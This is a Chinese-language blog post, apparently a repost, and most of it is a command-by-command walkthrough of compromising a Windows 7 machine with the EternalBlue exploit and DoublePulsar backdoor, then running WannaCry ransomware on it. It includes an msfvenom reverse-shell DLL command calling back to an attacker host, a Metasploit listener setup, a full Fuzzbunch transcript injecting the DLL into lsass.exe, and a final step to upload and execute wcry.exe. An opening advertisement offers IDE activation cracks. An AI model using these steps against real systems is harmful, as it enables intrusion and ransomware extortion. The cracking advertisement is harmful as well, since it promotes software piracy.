大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。
Jetbrains全系列IDE稳定放心使用
整个的复现的过程需要的环境以及工具有:
-
kali 2.0:用来监听获取反弹的shell。ip:192.168.15.174
-
winsever 2003 :需要装上python环境,勒索病毒攻击机。ip:192.168.15.141
-
win2007 :靶机,确保445端口开启。ip:192.168.15.144
-
永恒之蓝利用脚本shadowbroker-master以及勒索病毒wcry.exe,脚本shadowbroker-master的文件夹放在server2003 C盘根目录下,勒索病毒在kali的根目录下。
-
python2.6已经在winsever下装python需要的环境pywin32-221.win32.在sever2003中分别安装这些文件,并配置python环境变量,确保python能够正常运行
攻击环节:
1.在2003中修改C:\shadowbroker-master\windows下的Fuzzbunch.xml文件,修改内容如下,在这里要找到对应文件中的Resources文件的位置,然后对这个xml文件进行修改。在c:\的根目录下创建logs文件。
2.在kali上创建回链文件s.dll 命令如下:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.15.128 LPORT=4444 -f dll > s.dll
在生成文件后,把s.dll文件放到2003的根目录下,其中lhost中的ip地址为kali的ip 端口是随机的未占用端口。
3.在kali上运行,msfconsole,进行监听,命令如
msfconsole
use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
4. 在server2003上运行永恒之蓝利用脚本,发起对win2007的攻击:
python C:\shadowbroker-master\windows\fb.py
脚本配置环节,配置过程由上向下进行,关键点标,请注意:
[+] Set FbStorage => C:\shadowbroker-master\windows\storage
[*] Retargetting Session
[?] Default Target IP Address [] : 192.168.15.144
[?] Default Callback IP Address [] : 192.168.15.174
[?] Use Redirection [yes] : no
[?] Base Log directory [C:\logs] :
[*] Checking C:\logs for projects
Index Project
0 110
1 111
2 112
3 Create a New Project
[?] Project [0] : 3
[?] New Project Name : 1123
[?] Set target log directory to ‘C:\logs\1123\z192.168.15.144’? [Yes] :
[*] Initializing Global State
[+] Set TargetIp => 192.168.15.144
[+] Set CallbackIp => 192.168.15.174
[!] Redirection OFF
[+] Set LogDir => C:\logs\1123\z192.168.15.144
[+] Set Project => 1123
fb > use Eternalblue
[!] Entering Plugin Context :: Eternalblue
[] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.15.144
[] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Eternalblue
**Module: Eternalblue
=================**
Name Value
NetworkTimeout 60
TargetIp 192.168.15.144
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2
[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :
[] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 f
or no timeout.
[?] NetworkTimeout [60] :
[] TargetIp :: Target IP Address
[?] TargetIp [192.168.15.144] :
[] TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] :
[] VerifyTarget :: Validate the SMB string from target against the target sele
cted before exploitation.
[?] VerifyTarget [True] :
[] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor befor
e throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] :
[] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Dis
abled for XP/2K3.
[?] MaxExploitAttempts [3] :
[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup
allocations (XK/2K3) to do.
[?] GroomAllocations [12] :
**[] Target :: Operating System, Service Pack, and Architecture of target OS
0) XP Windows XP 32-Bit All Service Packs
1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs
[?] Target [1] : 1
[!] Preparing to Execute Eternalblue
*[] Mode :: Delivery mechanism
*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH
[?] Mode [0] : 1
[+] Run Mode: FB
[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure?
(y/n) [Yes] :
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel – local-tunnel-1
[?] Destination IP [192.168.15.144] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.15.144:445
[+] Configure Plugin Remote Tunnels
**Module: Eternalblue
===================**
Name Value
DaveProxyPort 0
NetworkTimeout 60
TargetIp 192.168.15.144
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target WIN72K8R2
[?] Execute Plugin? [Yes] :
[] Executing Plugin
在连接成功后:
use DoublePulsar
[] TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :
[*] Protocol :: Protocol for the backdoor to speak
*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] : 0
[*] Architecture :: Architecture of the target OS
*0) x86 x86 32-bits
1) x64 x64 64-bits
[?] Architecture [0] : 1
[+] Set Architecture => x64
[*] Function :: Operation for backdoor to perform
*0) OutputInstall Only output the install shellcode to a binary file on d
isk.
1) Ping Test for presence of backdoor
2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove’s backdoor from system
[?] Function [0] : 2
[+] Set Function => RunDLL
[] DllPayload :: DLL to inject into user mode
[?] DllPayload [] : C:\s.dll
[+] Set DllPayload => C:\s.dll
[] DllOrdinal :: The exported ordinal number of the DLL being injected to call
[?] DllOrdinal [1] :
[] ProcessName :: Name of process to inject into
[?] ProcessName [lsass.exe] :
[] ProcessCommandLine :: Command line of process to inject into
[?] ProcessCommandLine [] :
[!] Preparing to Execute Doublepulsar
上述执行完后会反弹给kali一个session,ip可以忽略:
在这以后已经拿到2007的shell了,然后输入shell把wcry.exe上传到2007并执行即可勒索win2007,
5.成功勒索win2007:
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/181227.html原文链接:https://javaforall.net
